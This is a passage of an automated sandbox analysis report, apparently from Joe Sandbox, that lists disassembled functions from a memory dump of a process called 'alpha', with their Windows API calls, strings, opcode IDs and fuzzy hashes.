                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                    • String ID:
                                                                    • API String ID: 850181435-0
                                                                    • Opcode ID: e30f486a492b6204ca4cfe222f6522b4387915627d195f2e6e30a15257811e7a
                                                                    • Instruction ID: e2e75a8564cf8f088e500b90007863c8ca339b61af74af0c2638904328efb993
                                                                    • Opcode Fuzzy Hash: e30f486a492b6204ca4cfe222f6522b4387915627d195f2e6e30a15257811e7a
                                                                    • Instruction Fuzzy Hash: 3C418D32608FC1C9E7609F20D8442EDB7B5FB89B98F845526DA4D4BB48CF38D54AC720
                                                                    APIs
                                                                      • Part of subcall function 00007FF719673578: _get_osfhandle.MSVCRT ref: 00007FF719673584
                                                                      • Part of subcall function 00007FF719673578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF71967359C
                                                                      • Part of subcall function 00007FF719673578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7196735C3
                                                                      • Part of subcall function 00007FF719673578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7196735D9
                                                                      • Part of subcall function 00007FF719673578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7196735ED
                                                                      • Part of subcall function 00007FF719673578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF719673602
                                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF719673491,?,?,?,00007FF719684420), ref: 00007FF719673514
                                                                    • _get_osfhandle.MSVCRT ref: 00007FF719673522
                                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF719673491,?,?,?,00007FF719684420), ref: 00007FF719673541
                                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF719673491,?,?,?,00007FF719684420), ref: 00007FF71967355E
                                                                      • Part of subcall function 00007FF7196736EC: _get_osfhandle.MSVCRT ref: 00007FF719673715
                                                                      • Part of subcall function 00007FF7196736EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF719673770
                                                                      • Part of subcall function 00007FF7196736EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF719673791
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                    • String ID:
                                                                    • API String ID: 4057327938-0
                                                                    • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                    • Instruction ID: c2ec13c5ceee3df027d8a33014f24fc8450609aa60026bdad476c456d3c52b45
                                                                    • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                    • Instruction Fuzzy Hash: 76319421B08E02C6E759BF25A40147DE6B2FF89768FD84135DA0E43395DE2CE90E8730
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                                                    • String ID: KEYS$LIST$OFF
                                                                    • API String ID: 411561164-4129271751
                                                                    • Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                                    • Instruction ID: a8e4d610857e9795652d6486f5ca7aec6b2aa2abccb475eb46911fdfcb4b4793
                                                                    • Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                                    • Instruction Fuzzy Hash: EA214F20A08F02C9E654BF25E455175E673EB947B8FC49231C61E462E5EF7C954E8630
                                                                    APIs
                                                                    • _get_osfhandle.MSVCRT ref: 00007FF7196701C4
                                                                    • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF71967E904,?,?,?,?,00000000,00007FF719673491,?,?,?,00007FF719684420), ref: 00007FF7196701D6
                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF71967E904,?,?,?,?,00000000,00007FF719673491,?,?,?,00007FF719684420), ref: 00007FF719670212
                                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF71967E904,?,?,?,?,00000000,00007FF719673491,?,?,?,00007FF719684420), ref: 00007FF719670228
                                                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF71967E904,?,?,?,?,00000000,00007FF719673491,?,?,?,00007FF719684420), ref: 00007FF71967023C
                                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF71967E904,?,?,?,?,00000000,00007FF719673491,?,?,?,00007FF719684420), ref: 00007FF719670251
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                    • String ID:
                                                                    • API String ID: 513048808-0
                                                                    • Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                    • Instruction ID: 7721c2ab5e375651a294b310c81d74246650eb2e01c8fab3f21ad63ddf6985c9
                                                                    • Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                    • Instruction Fuzzy Hash: 19219536A0CE828BE6546F50E584238EAB2FF4A77DF945135DA1E02290DF7CE44E8730
                                                                    APIs
                                                                    • _get_osfhandle.MSVCRT ref: 00007FF719673584
                                                                    • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF71967359C
                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7196735C3
                                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7196735D9
                                                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7196735ED
                                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF719673602
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                    • String ID:
                                                                    • API String ID: 513048808-0
                                                                    • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                    • Instruction ID: 693c3fc2fd764868aef9dba1d2e3665380b24546f052f79e930bc41a0c95fe07
                                                                    • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                    • Instruction Fuzzy Hash: EA114F31A08E4686EA586F24B645878EAB2FB4A77DF945375D92F033D0DE2CD44E8630
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                    • String ID:
                                                                    • API String ID: 4104442557-0
                                                                    • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                    • Instruction ID: 2f9fd9e65d6f1ffd1c6ea6deed42bc6656d1f1383632a61583b9972218c962d2
                                                                    • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                    • Instruction Fuzzy Hash: AF115432604F418AEB00EF74E85426873B5F71976CF801A31EA6D47754EF3CD5698360
                                                                    APIs
                                                                    • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7196871F9
                                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF71968720D
                                                                    • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF719687300
                                                                      • Part of subcall function 00007FF719685740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF7196875C4,?,?,00000000,00007FF719686999,?,?,?,?,?,00007FF719678C39), ref: 00007FF719685744
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: OpenSemaphore$CloseErrorHandleLast
                                                                    • String ID: _p0$wil
                                                                    • API String ID: 455305043-1814513734
                                                                    • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                    • Instruction ID: 68b9ba038e807fff9602563de78361f5d8dc6aad8d48635652180c297d419f87
                                                                    • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                    • Instruction Fuzzy Hash: C0618262B19F42C6EE25EF5594112B9E3B2EF84BA8FD84431DA4E07794DE3CD51A8330
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: wcschr$Heapiswspacememset$AllocProcess
                                                                    • String ID: %s
                                                                    • API String ID: 2401724867-3043279178
                                                                    • Opcode ID: 740c75b15b64cf7ac9eb9688b57878eb6de44e609a22920e9cf606d70b52c251
                                                                    • Instruction ID: 4e8b09422470b33c849b02af840bfab7a61b370298c8191c2993a5845e3bec12
                                                                    • Opcode Fuzzy Hash: 740c75b15b64cf7ac9eb9688b57878eb6de44e609a22920e9cf606d70b52c251
                                                                    • Instruction Fuzzy Hash: 2B51B772A08A82C9EB20AF11D8112F9B3B2FB45BA8F844035DA4D47794EF3CD54AC730
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: iswdigit
                                                                    • String ID: GeToken: (%x) '%s'
                                                                    • API String ID: 3849470556-1994581435
                                                                    • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                    • Instruction ID: 54095941a440b39d883869965bb2fed6aedea21e7f62f8763a8c2d938cb631a5
                                                                    • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                    • Instruction Fuzzy Hash: 76515931A08E4285EB25AF56A844179B7B2BB54B68F808435DA4D43394EF7CF89AC730
                                                                    APIs
                                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF719689A10
                                                                    • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF719689994
                                                                      • Part of subcall function 00007FF71968A73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF719689A82), ref: 00007FF71968A77A
                                                                      • Part of subcall function 00007FF71968A73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF719689A82), ref: 00007FF71968A839
                                                                      • Part of subcall function 00007FF71968A73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF719689A82), ref: 00007FF71968A850
                                                                    • wcsrchr.MSVCRT ref: 00007FF719689A62
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                                                    • String ID: %s=%s$.
                                                                    • API String ID: 3242694432-4275322459
                                                                    • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                    • Instruction ID: f72318cb5008f8eb9dae1037ce1f334eb25422d409e20ed3643eab22a2384a12
                                                                    • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                    • Instruction Fuzzy Hash: BD41A025A09B42D5EE14BF11A051279D2B2BF457B8FC45631DD5D073D5DE7CE44A8330
                                                                    APIs
                                                                    • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7196854E6
                                                                    • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF71968552E
                                                                      • Part of subcall function 00007FF71968758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF719686999,?,?,?,?,?,00007FF719678C39), ref: 00007FF7196875AE
                                                                      • Part of subcall function 00007FF71968758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF719686999,?,?,?,?,?,00007FF719678C39), ref: 00007FF7196875C6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$CreateCurrentMutexProcess
                                                                    • String ID: Local\SM0:%d:%d:%hs$wil$x
                                                                    • API String ID: 779401067-630742106
                                                                    • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                    • Instruction ID: 6678293168bf87fc2085985bbabedfd14448d092ad60cc6a699507359eb7f802
                                                                    • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                    • Instruction Fuzzy Hash: D1519572618F82C5EB11AF15E4017FAE372EB847A8F844072DA0D4BA59DE3CD44A8770
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectorytowupper
                                                                    • String ID: :$:
                                                                    • API String ID: 238703822-3780739392
                                                                    • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                    • Instruction ID: ed655146d95a9de663d7605671bf5cf1d5610ee3ab89ade5f70666753523c257
                                                                    • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                    • Instruction Fuzzy Hash: CD113462608A41C5EB29AF21A804239F6F2EF49BADF859032DD0D07790DF3CD40B8734
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                    • API String ID: 3677997916-3870813718
                                                                    • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                    • Instruction ID: 9915c46a011c6f0d6c98f24b52ce08cfb0742b53e31e5948ee76e94a74d432bd
                                                                    • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                    • Instruction Fuzzy Hash: B8114C32618F81C7EB109F14E44066AF7B1FB8A768F804231DA8D02768DF7CD049CB20
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memsetwcsrchr$wcschr
                                                                    • String ID:
                                                                    • API String ID: 110935159-0
                                                                    • Opcode ID: c69a388bc8b3a3ff16e2786c96b1100a2dbfc28b8c9e9179231870a23454a700
                                                                    • Instruction ID: 757f08876009f935cf4be7214b4c5f048b7d101bd3b44f18874105f4c9f49008
                                                                    • Opcode Fuzzy Hash: c69a388bc8b3a3ff16e2786c96b1100a2dbfc28b8c9e9179231870a23454a700
                                                                    • Instruction Fuzzy Hash: BF518462B09B8285FE21AF1198147F9E2B7BB49BB8F844531CD5D0B7C4DE3CE54B8220
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
